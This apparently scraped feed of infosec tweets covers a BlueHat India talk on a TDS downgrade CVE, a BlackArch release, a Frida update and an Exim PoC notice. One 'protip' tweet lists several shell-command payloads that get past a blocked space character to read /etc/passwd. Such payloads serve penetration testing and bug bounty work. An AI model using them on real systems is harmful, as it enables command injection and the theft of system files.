Vishal Mishra (@v1sh41), Senior Security Engineer, Azure Cloud Security at Microsoft presented a talk titled "The Dusky Shark: TDS Downgrade” at #BlueHatIndia. During his talk, Vishal discussed TDS protocol and earlier exploits, existing mitigation for TDS downgrade (including preventing downgrade, role of driver in mitigation, and clients flags), and the vulnerability & exploit details for CVE-2024-0056.
📣SPEAKER ANNOUNCEMENT📣
Our next #BlueHatIndia speaker is Vishal Mishra (@v1sh41), Senior Security Engineer, Azure Cloud Security at Microsoft. Vishal will present a talk titled "The Dusky Shark: TDS Downgrade." 👏
📣SPEAKER ANNOUNCEMENT📣
Our next #BlueHatIndia speaker is Vishal Mishra (@v1sh41), Senior Security Engineer, Azure Cloud Security at Microsoft. Vishal will present a talk titled "The Dusky Shark: TDS Downgrade." 👏
We've just started to build the new ISOs and OVA image. They will be released on the 1st of June. Stay tuned and just retweet this SH!T for all noobs, wannabes, pentesters and real hackers out there. #blackarch#linux#pentest#pentesting#hacktheplanet
#Protip need execute some command but "space" is blocked? try with:
IFS=,;`cat<<<cat,/etc/passwd`
cat$IFS/etc/passwd
cat${IFS}/etc/passwd
cat</etc/passwd
{cat,/etc/passwd} OR {ls,-las,/var} with args
X=$'cat\x20/etc/passwd'&&$X
#BugBounty#infosec
Frida 10.8 is out with brand new fork()-handling, early instrumentation of subprocesses aka. "child gating", and other goodies: https://t.co/xtVzYLNzbe
Researcher publishes PoC code and explanation for a severe buffer overflow vulnerability (CVE-2018-6789) in all versions of #Exim mail transfer agent (below 4.90.1) that could allow pre-auth remote code execution.
https://t.co/2TuzrNaZSr